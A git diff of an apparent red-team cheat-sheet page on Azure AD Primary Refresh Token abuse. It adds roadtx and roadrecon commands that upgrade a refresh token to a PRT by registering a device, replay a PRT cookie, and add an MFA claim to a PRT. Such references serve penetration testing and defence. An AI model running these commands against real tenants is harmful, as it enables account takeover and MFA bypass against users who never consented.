diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index d6481ff..19783f9 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -89,6 +89,8 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9 ## Primary Refresh Token +A Primary Refresh Token (PRT) is a key artifact in the authentication and identity management process in Microsoft's Azure AD (Azure Active Directory) environment. The PRT is primarily used for maintaining a seamless sign-in experience on devices. + * Use PRT token ```ps1 roadtx browserprtauth --prt --prt-sessionkey @@ -112,21 +114,12 @@ roadtx browserprtauth --prt --prt-sessionkey --keep-open -url * No method known to date. -### Upgrade Refresh Token to PRT +### Use PRT cookie -```ps1 -# Get correct token audience -roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file - -# Registering device -roadtx device -a register -n - -# Request PRT -roadtx prt --refresh-token -c .pem -k .key - -# Use a PRT -roadtx browserprtauth --prt --prt-sessionkey --keep-open -url https://portal.azure.com -``` +* `roadrecon auth prt-init` +* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) +* `roadrecon auth --prt-cookie --tokens-stdout --debug` +* Then browse to [login.microsoftonline.com ](login.microsoftonline.com ) with a cookie `x-ms-RefreshTokenCredential:` ### Request a PRT with Hybrid Device @@ -146,6 +139,20 @@ Use the user account to create a computer and request a PRT ``` +### Upgrade Refresh Token to PRT + +* Get correct token audience: `roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file` +* Registering device: `roadtx device -a register -n ` +* Request PRT `roadtx prt --refresh-token -c .pem -k .key` +* Use a PRT: `roadtx browserprtauth --prt --prt-sessionkey --keep-open -url https://portal.azure.com` + + +### Enriching a PRT with MFA claim + +* Request a special refresh token: `roadtx prtenrich -u username@domain` +* Request a PRT with MFA claim: `roadtx prt -r -c .pem -k .key` + + ## References * [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)